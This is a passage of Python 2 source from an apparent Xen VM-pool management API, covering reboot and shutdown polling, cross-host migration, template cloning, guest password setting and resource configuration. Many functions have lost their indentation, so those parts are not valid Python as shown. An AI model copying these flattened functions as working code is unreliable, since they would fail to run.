            'PV_bootloader_args': xeninfo.info.get('PV_bootloader_args'),
            'HVM_boot_policy': xeninfo.info.get('HVM_boot_policy'),
            'HVM_boot_params': xeninfo.info.get('HVM_boot_params'),
            'platform': xeninfo.get_platform(),
            'PCI_bus': xeninfo.get_pci_bus(),
            'tools_version': xeninfo.get_tools_version(),
            'other_config': xeninfo.info.get('other_config', {}),
            'tags' : xeninfo.info.get('tags', []),
            # -1 is reported while the domain is not running (domid is None).
            'domid': domid is None and -1 or domid,
            'is_control_domain': xeninfo.info['is_control_domain'],
            'metrics': xeninfo.get_metrics(),
            'cpu_qos': xeninfo.get_cpu_qos(),
            'security_label': xeninfo.get_security_label(),
            'crash_dumps': [],
            'suspend_VDI' : xennode.get_suspend_VDI(dom_uuid),
            'suspend_SR' : xennode.get_suspend_SR(dom_uuid),
            'connected_disk_SRs' : xennode.get_connected_disk_sr(dom_uuid),
            'connected_iso_SRs' : xennode.get_connected_iso_sr(dom_uuid),
            'pool_name': xeninfo.info.get('pool_name'),
#            'cpu_pool' : XendCPUPool.query_pool_ref(xeninfo.get_cpu_pool()),
        }
        #log.debug(record)
        return xen_api_success(record)
# def VM_get_record_lite(self, session, vm_ref=''):
# if BNPoolAPI._isMaster:
# hosts = self.host_get_all(session).get('Value', '')
# node = XendNode.instance()
# records = []
# if hosts:
# for host in hosts:
# if cmp(node.uuid, host) == 0:
# records.append(self._VM_get_record_lite(session))
# else:
# host_ip = BNPoolAPI.get_host_ip(host)
# records.append(xen_rpc_call(host_ip, 'VM_get_record_lite', '').get('Value', []))
# return xen_api_success(records)
# else:
# return xen_api_success(self._VM_get_record_lite(session))
def VM_get_record_lite(self, session, vm_ref=''):
'''
@deprecated: not used
'''
vms = self._VM_get_all(session).get('Value', [])
retv = []
if vms:
for vm_ref in vms:
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
# xennode = XendNode.instance()
if not xeninfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['HANDLE_INVALID', 'VM', vm_ref])
# domid = xeninfo.getDomid()
dom_uuid = xeninfo.get_uuid()
record_lite = {'uuid' : dom_uuid,
'power_state' : xeninfo.get_power_state(),
}
# log.debug(record_lite)
retv.append(record_lite)
return xen_api_success(retv)
def VM_clean_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Attempt to cleanly reboot the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_clean_reboot(session, vm_ref)
response = self._VM_reboot_checkout(session, vm_ref)
# self. _VM_set_all_tag(session, vm_ref)
# self._VM_set_all_rate(session, vm_ref, 'rate')
# self._VM_set_all_rate(session, vm_ref, 'burst')
# self.VM_start_set_IO_limit(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_clean_reboot", vm_ref)
return response
else:
response = self._VM_clean_reboot(session, vm_ref)
response = self._VM_reboot_checkout(session, vm_ref)
# self. _VM_set_all_tag(session, vm_ref)
# self._VM_set_all_rate(session, vm_ref, 'rate')
# self._VM_set_all_rate(session, vm_ref, 'burst')
# self.VM_start_set_IO_limit(session, vm_ref)
return response
def _VM_clean_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Attempt to cleanly reboot the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
XendTask.log_progress(0, 100, xeninfo.shutdown, "reboot")
return xen_api_success_void()
    def _VM_reboot_checkout(self, session, vm_ref):
        '''
        @author: wuyuewen
        @summary: Internal method. Checkout when reboot operation finish, VM_ID = VM_ID + 1.
            A reboot gives the guest a new (higher) domain id; poll once a
            second until it appears or the timeout hits.
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @return: True | False
        @rtype: dict.
        @raise Exception: Timeout 90 seconds.
        '''
        domid_old = self.VM_get_domid(session, vm_ref)['Value']
        i = 0
        flag = False
        # one_more grants a single extra 6-second grace period on timeout.
        one_more = True
        while True:
            i += 1
            domid_new = self.VM_get_domid(session, vm_ref)['Value']
            if cmp(int(domid_new), int(domid_old)) > 0:
                # New domain id is visible: reboot completed.
                log.debug('reboot finished: %s, cost time: %s' % (vm_ref, str(i)))
                flag = True
                break
            # NOTE: evaluates as (i > 90 and domid_new == -1) or not domid_new.
            elif cmp(i, 90) > 0 and cmp(int(domid_new), -1) == 0 or not domid_new:
                if one_more:
                    # Wind the counter back once and keep polling a bit longer.
                    one_more = False
                    i -= 6
                    continue
                else:
                    log.exception('reboot timeout!')
                    break
            else:
                time.sleep(1)
                continue
        return xen_api_success(flag)
def VM_clean_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Attempt to cleanly shutdown the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_clean_shutdown(session,vm_ref)
response = self._VM_shutdown_checkout(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_clean_shutdown", vm_ref)
return response
else:
response = self._VM_clean_shutdown(session, vm_ref)
response = self._VM_shutdown_checkout(session, vm_ref)
return response
def _VM_clean_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Attempt to cleanly shutdown the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
is_a_template = self._VM_get_is_a_template(session, vm_ref).get('Value')
if is_a_template:
return xen_api_error(XEND_API_ERROR_VM_IS_TEMPLATE)
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
XendTask.log_progress(0, 100, xeninfo.shutdown, "poweroff")
return xen_api_success_void()
def _VM_shutdown_checkout(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Checkout when shutdown operation finish.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise Exception: Timeout 90 seconds.
'''
i = 0
time_out = 60
flag = False
while True:
i += 1
# ps_new = self.VM_get_power_state(session, vm_ref)['Value']
domid = self.VM_get_domid(session, vm_ref).get('Value')
# log.debug(ps_new)
if not domid or cmp (int(domid), -1) == 0:
log.debug("shutdown finished: %s, cost time: %s" % (vm_ref, str(i)))
flag = True
break
elif cmp(i, time_out) > 0:
log.exception("shutdown timeout!")
break
else:
time.sleep(1)
continue
return xen_api_success(flag)
'''
when VM create from template, migrate VM to destinate host
VM is shutdown, refer to VM_start_on
'''
    def VM_change_host(self, session, vm_ref, temp_ref, host_ref, path):
        '''
        @author: wuyuewen
        @summary: When VM create from template, migrate VM to destinate host, refer to VM_create_on_from_template.
            The VM's config (sxp) is copied to the shared HA SR, then the VM is
            re-created from that sxp on the destination and destroyed at the source.
        @precondition: VM not running
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @param temp_ref: VM template uuid
        @param host_ref: migrate VM to which host
        @param path: sxp file location on the HA SR; recomputed below when the
            HA SR is mounted, so the incoming value is effectively a fallback.
        @return: True | False
        @rtype: dict.
        @raise xen_api_error: CHANGE_HOST_ON_FAILED
        '''
        try:
            log.debug("in VM_change_host: %s" % vm_ref)
            if BNPoolAPI._isMaster:
                # Local (non-pooled) VMs never move; nothing to do.
                if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
                    return xen_api_success(True)
                xennode = XendNode.instance()
                master_uuid = xennode.uuid
                h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
                if not h_ref:
                    # Pool bookkeeping lagged behind; fall back to the host that
                    # owns the template the VM was cloned from.
                    log.exception('Get host by VM failed! BNPoolAPI update_data_struct not sync!')
                    h_ref = BNPoolAPI.get_host_by_vm(temp_ref)
                h_ip = BNPoolAPI.get_host_ip(h_ref)
                host_ip = BNPoolAPI.get_host_ip(host_ref)
                paths = xennode.get_ha_sr_location()
                log.debug(paths)
#                if cmp(paths, {}) !=0:
                if paths:
                    # Only the first HA SR mount point is used for the sxp file.
                    for p in paths.values():
#                        path = os.path.join(p, CACHED_CONFIG_FILE)
                        path = os.path.join(p, '%s.sxp' % vm_ref)
                        break
                else:
                    path = ''
                log.debug('vm_migrate to ha path: %s' % path)
#                else:
#                    return xen_api_error(['nfs_ha not mounted', NFS_HA_DEFAULT_PATH])
                #copy sxp file to nfs
                log.debug("<dest ip>, <host ip>: <%s>, <%s>" % (host_ip, h_ip))
                xen_rpc_call(h_ip, 'VM_copy_sxp_to_nfs', vm_ref, path)
                # Four-way dispatch on (destination, current location) relative
                # to the master; re-create from sxp on the target, then destroy
                # the source copy only after the create succeeded.
                if cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) == 0:
                    log.debug("-----condition 1-----")
                    log.debug("vm dest: master, vm now: master")
                    response = {'Status' : 'Success', 'Value' : vm_ref}
#                    return xen_api_success(True)
                elif cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) != 0:
                    log.debug("-----condition 2-----")
                    log.debug("vm dest: master, vm now: node")
                    response = self.VM_create_from_sxp(session, path, False, False)
#                    log.debug('create from template: %s' % response)
                    if cmp (response.get('Status'), 'Success') == 0:
                        xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
#                        log.debug('destroy : %s' % response)
                elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) == 0:
                    log.debug("-----condition 3-----")
                    log.debug("vm dest: node, vm now: master")
                    log.debug("host ip (%s) path(%s)" % (host_ip, path))
                    response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, False, False)
                    if cmp (response.get('Status'), 'Success') == 0:
                        self._VM_destroy(session, vm_ref, False, False)
                elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) != 0:
                    if cmp(h_ref, host_ref) == 0:
                        log.debug("-----condition 4-----")
                        log.debug("vm dest: node1, vm now: node2, node1 = node2")
                        response = {'Status' : 'Success', 'Value' : vm_ref}
                    else:
                        log.debug("-----condition 5-----")
                        log.debug("vm dest: node1, vm now: node2, node1 != node2")
                        response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, False, False)
                        if cmp (response.get('Status'), 'Success') == 0:
                            xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
                if cmp (response.get('Status'), 'Success') == 0:
                    # Record the new ownership in the pool's data structures.
                    BNPoolAPI.update_data_struct('vm_start_on', vm_ref, h_ref, host_ref)
                    log.debug("Finished change host on: %s migrate vm(%s) to %s" % (h_ip, vm_ref, host_ip))
                return response
            else:
                # Non-master nodes never drive a migration themselves.
                path = ''
                return xen_api_success(True)
        except Exception, exn:
            log.exception(exn)
            return xen_api_error(['CHANGE_HOST_ON_FAILED,', exn])
#        finally:
#            if path:
#                cmd = 'rm -f %s' % path
#                doexec(cmd)
'''
1.clone vm on the same host of template
2.migrate vm to the destinate host
3.destroy origin vm
'''
    def VM_create_on_from_template(self, session, host_ref, vm_ref, newname, config, ping=False):
        '''
        @author: wuyuewen
        @summary: 1. Clone VM from template on the same Host
                  2. Migrate VM to destinate Host, if migrate success, destroy origin VM on origin Host.
                  3. Start VM and set VM password, if start VM failed, VM will destroy.
        @precondition: 1. Storage has enough space, template structure is legal. See VM_clone_MAC
                       2. See VM_change_host.
                       3. Destinate Host has enough free memory, VM already installed Agent for password change. See VM_set_config.
        @param session: session of RPC.
        @param host_ref: destinate Host
        @param vm_ref: VM's uuid
        @param newname: name of new VM
        @param config: dict type config
        @param ping: True | False, VM installed Agent.
                True: VM boot into OS then method return
                False: VM excute start option and resturn.
        @return: True | False
        @rtype: dict.
        @raise xen_api_error: CHANGE_HOST_ON_FAILED, create vm from template error
        '''
#        self.__vm_clone_lock__.acquire()
        # path is the sxp file placed on the shared HA SR; tracked so the
        # finally-block can always delete it, success or failure.
        path = None
        try:
            log.debug('1.vm_create from template>>>>>')
            newuuid = config.get('newUuid', None)
            mac_addr = config.get('MAC', None)
            st1 = time.time()
            paths = XendNode.instance().get_ha_sr_location()
            log.debug(paths)
            # Validate everything up front: VM/host existence, uuid uniqueness,
            # MAC format — each failure returns before any state is created.
            if not BNPoolAPI.check_vm(vm_ref):
                return xen_api_error(['VM_NOT_FOUND'])
            if not BNPoolAPI.check_host(host_ref):
                return xen_api_error(['HOST_NOT_FOUND'])
            check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
            if not check_uuid:
                return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
            if mac_addr and not self._VIF_is_mac_format_legal(mac_addr):
                return xen_api_error(['MAC_INVALID'])
#            if cmp(paths, {}) !=0:
            if paths:
                # Only the first HA SR mount point is used.
                for p in paths.values():
#                    path = os.path.join(p, CACHED_CONFIG_FILE)
                    path = os.path.join(p, '%s.sxp' % vm_ref)
                    break
            else:
                return xen_api_error(['HA_DIR_NOT_FOUND'])
            # Clone with a caller-supplied MAC when given, otherwise let the
            # clone generate one.
            if not mac_addr:
                log.debug('2. vm_clone >>>>>>')
                response = self.VM_clone(session, vm_ref, newname, None, newuuid)
            else:
                log.debug('2. vm_clone_mac >>>>>>')
                response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, None, newuuid)
            e1 = (time.time() - st1)
            log.debug('VM clone cost time :%s ' % e1)
#            log.debug("rpc.VM_start():", e4)
            if response.get('Status') == 'Success':
#                self.__vm_change_host_lock__.acquire()
#                try:
                domuuid = response.get('Value')
                log.debug('new VM uuid:%s' % domuuid)
                # change VM host from cur to host_ref
                response = self.VM_change_host(session, domuuid, vm_ref, host_ref, path)
                log.debug('change host response: %s' % response)
#                finally:
#                    self.__vm_change_host_lock__.release()
                if response.get('Status') == 'Success':
                    log.debug('3. vm_set_config>>>>>')
                    response = self.VM_set_config(session, domuuid, config, ping) # when set config failed, VM will be deleted!
                    e2 = (time.time() - st1)
                    log.debug(">>>>VM_create_on_from_template<<<< Total cost: %s" % e2)
                    if response.get('Status') == 'Success':
                        return response
            # Any non-success path from clone/migrate/config falls through here.
            return xen_api_error(['create vm from template error'])
        except Exception, exn:
            log.exception(exn)
            return xen_api_error(['create vm from template error: %s' % exn])
        finally:
            # Best-effort removal of the temporary sxp file on the HA SR.
            if path:
                st1 = time.time()
                cmd = 'rm -f %s' % path
                doexec(cmd)
                e1 = (time.time() - st1)
                log.debug('remove %s cost: %s' %(path, e1))
#        finally:
#            self.__vm_clone_lock__.release()
    def VM_create_from_template(self, session, vm_ref, newname, config):
        '''
        @deprecated: not used
        @summary: Older variant of VM_create_on_from_template without host
            placement: clone from template, then apply config. Kept for reference.
        @param session: session of RPC.
        @param vm_ref: template VM's uuid
        @param newname: name of new VM
        @param config: dict type config (may carry 'newUuid' and 'MAC')
        @return: VM record dict on success, error otherwise
        @rtype: dict.
        '''
        log.debug('1.vm_create from template>>>>>')
        newuuid = config.get('newUuid', None)
        mac_addr = config.get('MAC', None)
        st1 = time.time()
        # NOTE(review): unlike VM_create_on_from_template, the MAC check here is
        # unconditional — a missing MAC (None) is passed to the validator.
        check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
        if not self._VIF_is_mac_format_legal(mac_addr):
            return xen_api_error(['MAC_INVALID'])
        if not check_uuid:
            return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
        if not mac_addr:
            log.debug('2. vm_clone >>>>>>')
            response = self.VM_clone(session, vm_ref, newname, None, newuuid)
        else:
            log.debug('2. vm_clone_mac >>>>>>')
            response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, None, newuuid)
        e1 = (time.time() - st1)
        log.debug('VM clone cost time :%s ' % e1)
#        log.debug("rpc.VM_start():", e4)
        if response.get('Status') == 'Success':
            domuuid = response.get('Value')
            log.debug('new VM uuid:%s' % domuuid)
            log.debug('3. vm_set_config>>>>>')
            response = self.VM_set_config(session, domuuid, config) # when set config failed, VM will be deleted!
            if response.get('Status') == 'Success':
                return response
        return xen_api_error(['create vm from template error'])
    def VM_create_with_VDI(self, session, host_ref, vm_ref, newname, config, ping=False):
        '''
        @deprecated: not used
        @summary: Variant of VM_create_on_from_template where the new VDI uuids
            (including the system VDI via config['vdiUuid']) are pre-computed and
            the clone is told the VDIs already exist (vdi_exists=True).
        @param session: session of RPC.
        @param host_ref: destinate Host
        @param vm_ref: template VM's uuid
        @param newname: name of new VM
        @param config: dict type config
        @param ping: True | False, wait for guest OS boot in VM_set_config.
        @return: VM record dict on success; xen_api_success(False) on exception.
        @rtype: dict.
        '''
#        self.__vm_clone_lock__.acquire()
        path = None
        try:
            storage = self._get_BNStorageAPI_instance()
            log.debug('1.vm_create from template>>>>>')
            newuuid = config.get('newUuid', None)
            mac_addr = config.get('MAC', None)
            # Up-front validation, mirroring VM_create_on_from_template.
            if not BNPoolAPI.check_vm(vm_ref):
                return xen_api_error(['VM_NOT_FOUND'])
            if not BNPoolAPI.check_host(host_ref):
                return xen_api_error(['HOST_NOT_FOUND'])
            if not self._VIF_is_mac_format_legal(mac_addr):
                return xen_api_error(['MAC_INVALID'])
            check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
            if not check_uuid:
                return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
            vdi_new_uuid = config.get('vdiUuid', None)
            st1 = time.time()
            vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
            sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
            if not newuuid:
                newuuid = genuuid.gen_regularUuid()
            # Map each template VDI to a fresh uuid; the system VDI gets the
            # caller-supplied uuid when one is provided.
            vdi_uuid_map = {}
            vdis = vdis_resp.get('Value', [])
            if vdis:
                for vdi in vdis:
                    vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
            if sys_vdi in vdis and vdi_new_uuid:
                vdi_uuid_map[sys_vdi] = vdi_new_uuid
            paths = XendNode.instance().get_ha_sr_location()
            log.debug(paths)
#            if cmp(paths, {}) !=0:
            if paths:
                for p in paths.values():
#                    path = os.path.join(p, CACHED_CONFIG_FILE)
                    path = os.path.join(p, '%s.sxp' % vm_ref)
                    break
            else:
                return xen_api_error(['HA_DIR_NOT_FOUND'])
            # vdi_exists=True: clone reuses the mapped VDIs instead of creating.
            if not mac_addr:
                log.debug('2. vm_clone >>>>>>')
                response = self.VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid, True)
            else:
                log.debug('2. vm_clone_mac >>>>>>')
                response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid, True)
            e1 = (time.time() - st1)
            log.debug('VM clone cost time :%s ' % e1)
#            log.debug("rpc.VM_start():", e4)
            if response.get('Status') == 'Success':
                domuuid = response.get('Value')
                log.debug('new VM uuid:%s' % domuuid)
                # change VM host from cur to host_ref
                response = self.VM_change_host(session, domuuid, vm_ref, host_ref, path)
                log.debug('change host response: %s' % response)
                if response.get('Status') == 'Success':
                    log.debug('3. vm_set_config>>>>>')
                    response = self.VM_set_config(session, domuuid, config, ping) # when set config failed, VM will be deleted!
                    e2 = (time.time() - st1)
                    log.debug(">>>>VM_create_with_VDI<<<< Total cost: %s" % e2)
                    if response.get('Status') == 'Success':
                        return response
            return xen_api_error(['create vm from template error'])
        except Exception, exn:
            log.exception(exn)
            # NOTE(review): sibling methods return xen_api_error here; this one
            # reports success-with-False instead — callers must check the Value.
            return xen_api_success(False)
#        finally:
#            self.__vm_clone_lock__.release()
def VM_set_passwd(self, session, vm_ref, vm_ip, passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: VM set password use SSH protocol. The set password agent running in Host, use host 10086 port.
@precondition: Set password Agent is running, windows VM has SSH-Server installed.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vm_ip: VM's ip
@param passwd: new password
@param origin_passwd: origin password
@param vm_type: windows | linux
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_set_passwd(session, vm_ref, vm_ip, passwd, origin_passwd, vm_type)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_set_passwd", vm_ref, vm_ip, passwd, origin_passwd, vm_type)
return response
else:
response = self._VM_set_passwd(session, vm_ref, vm_ip, passwd, origin_passwd, vm_type)
return response
    def _VM_set_passwd(self, session, vm_ref, vm_ip, passwd, origin_passwd, vm_type ):
        '''
        @author: wuyuewen
        @summary: Internal method. VM set password use SSH protocol. The set password agent running in Host, use host 10086 port.
        @precondition: Set password Agent is running, windows VM has SSH-Server installed.
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @param vm_ip: VM's ip
        @param passwd: new password
        @param origin_passwd: origin password
        @param vm_type: windows | linux
        @return: True | False
        @rtype: dict.
        '''
        #log.debug('vm set passwd(%s) ip(%s) origin(%s) new(%s) vm_type(%s)' % (vm_ref, vm_ip, origin_passwd, passwd, vm_type))
        # by henry
        # Passwords are masked in the log on purpose — do not revert to the line above.
        log.debug('vm set passwd(%s) ip(%s) origin(%s) new(%s) vm_type(%s)' % (vm_ref, vm_ip, "********", "********", vm_type))
        # Probe reachability first (3s ping deadline), with one retry, so the
        # XML-RPC agent call is not attempted against an unreachable guest.
        is_on = self._test_ip(vm_ip, 3)
        if not is_on:
            log.debug('vm(%s) ip(%s) cannot ping, try one more time...' % (vm_ref, vm_ip))
            is_on = self._test_ip(vm_ip, 3)
            if not is_on:
                log.debug('Finally, vm(%s) ip(%s) cannot ping' % (vm_ref, vm_ip))
                return xen_api_success(False)
        # The local password agent listens on 127.0.0.1:10086 and performs the
        # actual SSH-based password change inside the guest.
        proxy = xmlrpclib.Server("http://127.0.0.1:10086")
        flag = proxy.VM_set_passwd(vm_ip, passwd, origin_passwd, vm_type)
        return xen_api_success(flag)
def VM_set_config(self, session, vm_ref, config, ping=False):
'''
@author: wuyuewen
@summary: Contain several options:
1. set vm vcpu and memory.
2. start vm.
3. ping vm to check if start.
4. set password use SSH protocol or Serial device.
@precondition: Every option has an error handling or rollback option.
1. set vm vcpu and memory error, vm destroy
2. vm cannot start, vm destroy
3. vm cannot ping, vm do not get ip, return error and remain vm to check
4. vm cannot set passwd, return error and remain vm to check
@param session: session of RPC.
@param vm_ref: VM's uuid
@param config: dict type config
@param ping: True | False, ping or donnot ping after start.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM set config error, VM start and change password error.
'''
log.debug("Starting VM_set_config...")
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
log.debug('Master node...')
response = self._VM_set_config(session, vm_ref, config, ping)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_set_config", vm_ref, config, ping)
return response
else:
response = self._VM_set_config(session, vm_ref, config, ping)
return response
    def _VM_set_config(self, session, vm_ref, config, ping=False):
        '''
        @author: wuyuewen
        @summary: Internal method. Contain several options:
                1. set vm vcpu and memory.
                2. start vm.
                3. ping vm to check if start.
                4. set password use SSH protocol or Serial device.
        @precondition: Every option has an error handling or rollback option.
                1. set vm vcpu and memory error, vm destroy
                2. vm cannot start, vm destroy
                3. vm cannot ping, vm do not get ip, return error and remain vm to check
                4. vm cannot set passwd, return error and remain vm to check
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @param config: dict type config
        @param ping: True | False, ping or donnot ping after start.
        @return: True | False
        @rtype: dict.
        @raise xen_api_error: VM set config error, VM start and change password error.
        '''
        # Collected timings for the debug summary at the end.
        time_log = {}
        log.debug('vm set config')
        MB = 1024*1024
        # Pull the knobs out of the config dict; all have defaults.
        vcpu_num = int(config.get('cpuNumber', 1))
        memory_value = int(config.get('memoryValue', 1024))*MB
        vlanid = config.get('vlanId', '-1')
        IO_read_limit = int(config.get('IOreadLimit', 30))
        IO_write_limit = int(config.get('IOwriteLimit', 100))
        vm_passwd = config.get('passwd', '')
        origin_passwd = config.get('origin_passwd', '')
        vm_ip = config.get('IP', '')
        vm_type = config.get('type', 'linux')
        try:
            st1 = time.time()
            #1. set cup and memeory
            # Order matters: when growing, raise the live count before the max;
            # when shrinking, lower the max first.
            vcpu_max = self._VM_get_VCPUs_max('', vm_ref).get('Value')
            if vcpu_num > vcpu_max:
                self._VM_set_VCPUs_number_live('', vm_ref, vcpu_num)
                self._VM_set_VCPUs_max(session, vm_ref, vcpu_num)
                self._VM_set_VCPUs_at_startup(session, vm_ref, vcpu_num)
            elif vcpu_num < vcpu_max:
                self._VM_set_VCPUs_max(session, vm_ref, vcpu_num)
                self._VM_set_VCPUs_number_live('', vm_ref, vcpu_num)
                self._VM_set_VCPUs_at_startup(session, vm_ref, vcpu_num)
            # Same ordering rule for memory: shrink dynamic before static max,
            # grow static max before dynamic. Dynamic min is pinned at 512MB.
            memory = int(self._VM_get_memory_static_max(session, vm_ref).get('Value'))
            log.debug('memory: %s' % memory)
            if memory > memory_value:
                #log.debug('memory > memory_value: --> %s > %s' % (memory, memory_value))
                self._VM_set_memory_dynamic_max(session, vm_ref, memory_value)
                self._VM_set_memory_dynamic_min(session, vm_ref, 512*MB)
                self._VM_set_memory_static_max(session, vm_ref, memory_value)
            elif memory < memory_value:
                #log.debug('memory < memory_value: --> %s < %s' % (memory, memory_value))
                self._VM_set_memory_static_max(session, vm_ref, memory_value)
                self._VM_set_memory_dynamic_max(session, vm_ref, memory_value)
                self._VM_set_memory_dynamic_min(session, vm_ref, 512*MB)
            #2. set vlanid
            #self._VM_set_tag_by_ethnum(session, vm_ref, 0, vlanid)
            #log.debug('set tag in other config:>>>>>>>>>>>>>>>>')
            # The VLAN tag for eth0 is written straight into other_config.
            dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
            dominfo.info['other_config'].setdefault('tag',{})
            dominfo.info['other_config']['tag']['0'] = vlanid
            #self._VM_save(dominfo)
            #3. set IO limit
            # NOTE(review): only the write limit is applied; IO_read_limit is
            # read from config but never used — confirm whether intentional.
            self._VM_set_IO_rate_limit(session, vm_ref, 'write', IO_write_limit, 'MBps')
            e1 = time.time() - st1
            time_log['set config'] = e1
            log.debug('4. finish set vm(%s) vcpu,memeory and io rate limit' % vm_ref)
            log.debug('====set vm(%s) vcpu,memeory and io rate limit cost time: %s=======' % (vm_ref, e1))
        except Exception, exn:
            # Rollback: a half-configured VM is useless — destroy it and its VDIs.
            log.error(exn)
            self.VM_destroy(session, vm_ref, True)
            storage = self._get_BNStorageAPI_instance()
            storage.VDI_destroy(session, vm_ref)
            return xen_api_error(['VM set config error'])
        try:
            #5. start vm
#            st2 = time.time()
            log.debug('5. excute start vm>>>>>>>>>>>>>>>>>>')
            start_status = self._VM_start(session, vm_ref, False, True).get('Status')
            if start_status == 'Failure':
                self._VM_destroy(session, vm_ref, True) # start failed, vm destroy
                log.debug('6. vm start failed>>>>>>>>> return')
                return xen_api_error('vm(%s) start error' % vm_ref)
            # NOTE(review): is_setPasswd stays False on every synchronous path;
            # the threads below change passwords asynchronously, so the
            # 'setpasswd' field in the returned record does not reflect them.
            is_setPasswd = False
            if vm_ip:
                # Guest has a known IP: check boot/set password over the network.
                if ping:
                    # Synchronous wait for the OS, then change passwd in a thread.
                    timeout = 120
                    deadline = 1
                    st2 = time.time()
                    log.debug('6. start to check whether vm load OS>>>>>')
                    is_on = self._VM_start_checkout(vm_ip, timeout, deadline)
                    e2 = time.time() - st2
                    log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
#                    time_log['load os'] = e2
                    if not is_on:
                        log.debug('7. vm(%s) cannot ping in %s times' % (vm_ref, str(timeout * 1)))
                        return xen_api_error('vm(%s) cannot ping in %s' % (vm_ref, str(timeout * 1)))
                    if is_on and vm_passwd and origin_passwd:
                        set_passwd = threading.Thread(target=self._set_passwd, name='set_passwd',\
                                                      kwargs={'session':session, 'vm_ip':vm_ip, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
                                                              'origin_passwd':origin_passwd, 'vm_type':vm_type})
                        set_passwd.start()
                else:
                    # Fire-and-forget: boot check and password change both async.
                    check_start_and_set_passwd = threading.Thread(target=self._check_start_and_set_passwd, name='check_start_and_set_passwd',\
                                                      kwargs={'session':session, 'vm_ip':vm_ip, 'vm_ref':vm_ref, 'vm_passwd':vm_passwd, \
                                                              'origin_passwd':origin_passwd, 'vm_type':vm_type})
                    check_start_and_set_passwd.start()
            else:
                # No IP known: fall back to the guest's serial channel.
                log.debug('Start VM and change passwd using serial.')
                if ping:
                    timeout = 120
                    st2 = time.time()
                    log.debug('6. start to check whether vm load OS via serial>>>>>')
                    is_on = self._VM_start_checkout_via_serial(session, vm_ref, timeout)
                    e2 = time.time() - st2
                    log.debug('=====vm(%s) start and load OS cost time: %s=======' %(vm_ref, e2))
#                    time_log['load os'] = e2
                    if not is_on:
                        log.debug('7. vm(%s) cannot ping via serial in %s times' % (vm_ref, str(timeout * 1)))
                        return xen_api_error('vm(%s) cannot ping via serial in %s' % (vm_ref, str(timeout * 1)))
                    if is_on and vm_passwd:
